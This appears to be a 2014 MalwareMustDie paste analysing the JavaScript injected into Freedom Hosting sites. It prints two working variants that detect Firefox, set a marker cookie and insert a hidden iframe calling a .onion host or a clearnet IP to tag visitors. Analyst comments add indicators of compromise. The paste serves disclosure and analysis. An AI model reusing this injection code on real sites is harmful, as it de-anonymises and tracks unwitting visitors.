Freedom Hosting FBI IFRAME Redirector Malware Script

MalwareMustDie Aug 12th, 2014 (edited) 1,495 Never
  1. # MalwareMustDie!
  2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
  3. # It contains the IFRAMER Malware method to redirect the victim to the infector site, at the url:
  4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
  5. #
  6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
  7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infecting every visitor to that site!!
  8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must have been affected by this IFRAMER.
  9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
  10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
  11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
  12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
  13. # Ref: http://pastebin.com/bu2Ya0n6
  14. # Ref: http://pastebin.com/pmGEj9bV
  15.  
  16. Additional: Analysis of the Magento exploit payload used to infect Tor visitors leads to the SAME IP:
  17. # Ref: https://pastebin.com/RTwsyrH8
  18. # Ref: https://pastebin.com/aFUP2gLB
  19.  
  20.  
  21. // Case 1
  22.  
  23.     function createCookie(name,value,minutes) {
  24.             if (minutes) {
  25.                     var date = new Date();
  26.                     date.setTime(date.getTime()+(minutes*60*1000));
  27.                     var expires = "; expires="+date.toGMTString();
  28.             }
  29.             else var expires = "";
  30.             document.cookie = name+"="+value+expires+"; path=/";
  31.     }
  32.      
    // Returns the raw value of cookie `name`, or null when it is absent.
    // Splits document.cookie ("a=1; b=2") on ';', strips leading spaces from
    // each piece and returns the first one that starts with `name=`.
    // The value is not decoded (no decodeURIComponent).
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i < ca.length;i++) {
            var c = ca[i];
            // drop the space browsers insert after each ';'
            while (c.charAt(0)==' ') c = c.substring(1,c.length);
            // prefix match on "name=" after trimming
            if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }
  43.      
    // Browser gate: true when the page is (or claims to be) running in Firefox.
    // The first two checks are Firefox-only properties (document.getBoxObjectFor,
    // window.mozInnerScreenX); the third is a case-insensitive User-Agent match.
    // `!= null` treats both null and undefined as "absent".
    // NOTE(analysis): everything that follows (format_quick -> updatify) runs
    // only when this returns true, so non-Firefox visitors never get the iframe.
    function isFF() {
        return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
    }
  47.      
    // Injects the callback iframe into the current page.
    // The frame is 5px high with no border and no scrollbars, and its src is
    // the infector URL carrying a fixed requestID; appending it to <body> makes
    // the visitor's browser fetch that URL right away.
    // Detection: an iframe pointing at this host/path is the visible DOM IoC;
    // a frame-src Content-Security-Policy on the hosting site would have
    // blocked the load.
    function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        // callback URL; the requestID matches the "n_serv" cookie value set in format_quick
        iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
        iframe.height = "5";
        // "*" is not a valid length value, so it is presumably ignored by the browser
        iframe.width = "*";
        document.body.appendChild(iframe);
    }
  58.      
    // One-shot trigger: inject the iframe only when the "n_serv" marker cookie
    // is absent, then set it for 30 minutes so the same browser is not tagged
    // again on every page load. The cookie value equals the requestID in the
    // iframe URL (see updatify).
    // Detection: an "n_serv" cookie holding this UUID marks a browser that has
    // already loaded the callback frame.
    function format_quick() {
        if ( ! readCookie("n_serv") ) {
            createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
            updatify();
        }
    }
  65.      
    // Polls until the document is usable (readyState "interactive" or
    // "complete"), then runs the Firefox-gated trigger once.
    // While still loading it re-arms itself every 250 ms; once ready it runs a
    // single time and stops polling whether or not isFF() was true.
    function isReady()
    {
        if ( document.readyState === "interactive" || document.readyState === "complete" ) {

            if ( isFF() ) {
                format_quick();
            }
        }
        else
        {
            setTimeout(isReady, 250);
        }
    }
    // Entry point: first readiness check 250 ms after the script runs.
    setTimeout(isReady, 250);
  80.  
  81.  
  82. // Case 2
  83.  
// Writes a cookie `name=value` scoped to the whole site (path=/).
// name    - cookie name
// value   - cookie value, written raw (no URL-encoding)
// minutes - lifetime in minutes; a falsy value (0/undefined) yields a
//           session cookie with no expires attribute
function createCookie(name, value, minutes) {
    if (minutes) {
        var date = new Date();
        // expiry = now + minutes, rendered as an HTTP date string
        // (toGMTString is the legacy alias of toUTCString)
        date.setTime(date.getTime() + (minutes * 60 * 1000));
        var expires = "; expires=" + date.toGMTString();
    } else var expires = ""; // `var` is function-scoped; this only re-declares `expires`
    // No Secure/SameSite attributes; the "n_serv" marker written via this
    // function (see freedomhost) is the only state the script persists.
    document.cookie = name + "=" + value + expires + "; path=/";
}
  92.  
// Returns the raw value of cookie `name`, or null when it is absent.
// Splits document.cookie ("a=1; b=2") on ';', strips leading spaces from
// each piece and returns the first one that starts with `name=`.
// The value is not decoded (no decodeURIComponent).
function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        // drop the space browsers insert after each ';'
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        // prefix match on "name=" after trimming
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
}
  103.  
// Browser gate: true when the page is (or claims to be) running in Firefox.
// The first two checks are Firefox-only properties (document.getBoxObjectFor,
// window.mozInnerScreenX); the third is a case-insensitive User-Agent match.
// `!= null` treats both null and undefined as "absent".
// NOTE(analysis): everything that follows (freedomhost -> updatify) runs only
// when this returns true, so non-Firefox visitors never get the iframe.
function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
  107.  
// Injects the callback iframe into the current page.
// Same construction as Case 1, but the src points at a clearnet IP address
// (the host marked (1) below) rather than a .onion service, so the fetch
// leaves the Tor network and reveals the visitor's real network path.
// Detection: an iframe pointing at this host/path is the visible DOM IoC;
// a frame-src Content-Security-Policy on the hosting site would have
// blocked the load.
function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    // callback URL; the requestID matches the "n_serv" cookie value set in freedomhost
    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; // <== (1) 1ST CALLBACK SELF EXPLANATORY
    iframe.height = "5";
    // "*" is not a valid length value, so it is presumably ignored by the browser
    iframe.width = "*";
    document.body.appendChild(iframe);
}
  118.  
// One-shot trigger: inject the iframe only when the "n_serv" marker cookie
// is absent, then set it for 30 minutes so the same browser is not tagged
// again on every page load. The cookie value equals the requestID in the
// iframe URL (see updatify).
// Detection: an "n_serv" cookie holding this UUID marks a browser that has
// already loaded the callback frame.
function freedomhost() {
    if (!readCookie("n_serv")) {
        createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
        updatify();
    }
}
  125.  
// Polls until the document is usable (readyState "interactive" or
// "complete"), then runs the Firefox-gated trigger once.
// While still loading it re-arms itself every 250 ms; once ready it runs a
// single time and stops polling whether or not isFF() was true.
function isReady() {
    if (document.readyState === "interactive" || document.readyState === "complete") {
        if (isFF()) {
            // disabled debug alert left in the sample
            //window.alert(window.location + "Firefox Detected.")
            freedomhost();
        }
    } else {
        setTimeout(isReady, 250);
    }
}
// Entry point: first readiness check 250 ms after the script runs.
setTimeout(isReady, 250);
  137.  
  138. // Noted: same method,
  139. // the second script uses an IP-address callback, contacting the remote host marked (1) above (IP info below):
  140.  
  141.   IP Address: 65.222.202.53
  142.   City: Triadelphia
  143.   State or Region: West Virginia
  144.   Country: United States
  145.   ISP: Verizon Business
  146.   Latitude & Longitude: 40.0900-80.6220
  147.   Domain: verizonbusiness.com
  148.   ZIP Code: 26059
  149.  
  150. ---
  151. #MalwareMustDie! @unixfreaxjp